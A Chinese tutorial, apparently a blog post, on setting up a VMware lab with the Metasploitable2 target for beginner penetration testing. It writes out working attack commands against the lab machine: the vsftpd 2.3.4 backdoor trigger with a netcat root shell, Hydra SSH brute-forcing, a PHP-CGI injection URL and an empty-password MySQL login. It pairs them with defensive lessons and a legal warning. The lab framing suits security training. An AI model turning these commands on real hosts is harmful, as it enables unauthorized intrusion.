别再只盯着Kali了!用VMware+Metasploitable2,手把手教你搭建第一个渗透测试实战环境

张开发
2026/4/20 4:13:21 15 分钟阅读

分享文章

别再只盯着Kali了!用VMware+Metasploitable2,手把手教你搭建第一个渗透测试实战环境
从零搭建渗透测试实验室VMware与Metasploitable2实战指南第一次接触渗透测试时很多人会被各种专业术语和复杂环境吓退。Kali Linux虽然强大但对新手来说配置双系统或处理虚拟机网络设置往往令人头疼。其实用普通笔记本电脑配合VMware Workstation和Metasploitable2靶机就能搭建一个完整的实战环境——就像安装办公软件一样简单。1. 环境准备选择适合新手的工具组合工欲善其事必先利其器。对于刚入门网络安全的学习者建议从最基础的工具开始VMware Workstation Player免费版本足够使用比VirtualBox更稳定网络配置更直观Metasploitable2专为学习设计的漏洞靶机包含数十种常见漏洞Windows/Mac主机普通配置即可无需高性能硬件提示所有软件均可从官网下载避免使用来路不明的安装包为什么推荐这个组合相比直接使用KaliVMware的图形界面更友好网络模式切换一目了然。Metasploitable2则省去了自己搭建漏洞环境的麻烦开箱即用。下表对比了不同方案的优劣方案难度所需时间适合人群物理机安装Kali高2小时有Linux基础者虚拟机Kali自建靶机中1小时熟悉虚拟机网络者VMwareMetasploitable2低20分钟完全新手2. 十分钟快速部署Metasploitable2Metasploitable2的安装过程简单到令人惊讶从官方镜像站下载OVA文件约1.7GB打开VMware选择文件→打开找到下载的OVA文件保持默认配置点击导入导入完成后直接启动虚拟机首次启动会遇到一个常见问题系统提示Login:但输入不显示。这不是错误——Linux系统的密码输入默认不显示字符。直接输入用户名msfadmin 密码msfadmin成功登录后会看到Ubuntu系统的命令行界面。此时靶机已经准备就绪但还需要正确配置网络才能从主机访问。3. 网络配置详解NAT还是桥接虚拟机网络模式选择是新手最容易困惑的环节。VMware提供三种主要模式桥接模式虚拟机和主机就像两台独立设备需要路由器分配IPNAT模式虚拟机通过主机上网自成子网仅主机模式完全隔离外部网络对于渗透测试练习NAT模式是最佳选择右键虚拟机→设置→网络适配器选择NAT模式勾选启动时连接验证网络连通性的方法# 在Metasploitable2中执行 ifconfig # 记下显示的IP地址如192.168.152.128 # 在主机上打开命令提示符执行 ping 192.168.152.128如果收到回复说明网络配置正确。若遇到问题检查以下常见故障点虚拟机网络适配器是否启用主机防火墙是否阻止ICMP请求VMware NAT服务是否运行服务中启动VMware NAT Service4. 基础漏洞实战从FTP弱口令开始环境就绪后让我们尝试第一个漏洞利用——FTP弱口令。Metasploitable2的FTP服务端口21存在多个漏洞在主机打开命令提示符连接FTPftp 192.168.152.128使用默认凭证登录用户名msfadmin 密码msfadmin登录成功后尝试基本命令ls # 列出文件 get [文件名] # 下载文件更深入的利用是著名的笑脸漏洞vsftpd 2.3.4后门使用telnet连接并在用户名后添加:)telnet 192.168.152.128 21 USER test:) PASS test漏洞会开放6200端口用netcat连接nc 192.168.152.128 6200此时已获得root权限的shell注意实际操作中建议先在测试环境练习避免对生产系统造成影响5. SSH暴力破解与防御启示Metasploitable2的SSH服务端口22同样存在弱口令问题。我们可以用Hydra进行暴力破解演示hydra -l msfadmin -P passwords.txt 192.168.152.128 ssh其中passwords.txt是密码字典文件。这个实验告诉我们默认凭证必须修改限制SSH尝试次数修改/etc/ssh/sshd_config考虑使用密钥认证替代密码6. Web漏洞挖掘PHP CGI与Samba靶机的80端口运行着存在漏洞的Web服务访问http://192.168.152.128/phpinfo.php可查看服务器信息利用PHP CGI漏洞执行命令http://192.168.152.128/cgi-bin/php?-dallow_url_includeon-dsafe_modeoff-dsuhosin.simulationon-ddisable_functions-dopen_basedirnone-dauto_prepend_filephp://input-nSamba共享漏洞端口139/445同样值得关注smbclient -L //192.168.152.128这些漏洞在真实网络中仍然广泛存在管理员应及时更新服务软件关闭不必要的网络共享限制可访问IP范围7. 数据库安全MySQL空密码漏洞检查3306端口会发现MySQL允许root账户空密码登录mysql -h 192.168.152.128 -u root直接按回车即可登录这对数据库安全是灾难性的。正确做法设置复杂密码限制远程访问定期审计数据库权限8. 综合练习与学习建议完成基础漏洞利用后可以尝试更复杂的攻击链通过Web漏洞上传webshell利用内核提权漏洞获取root建立持久化后门学习路径建议每周专注1-2类漏洞同时学习防御措施记录实验笔记最后提醒所有练习应在自己搭建的环境中进行未经授权测试他人系统可能涉及法律问题。Metasploitable2只是开始后续可以尝试其他靶机如DVWA、WebGoat等逐步提升难度。

更多文章